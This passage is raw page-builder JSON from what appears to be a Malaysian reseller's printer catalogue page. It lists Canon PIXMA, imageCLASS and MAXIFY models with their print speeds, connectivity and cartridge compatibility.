]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td 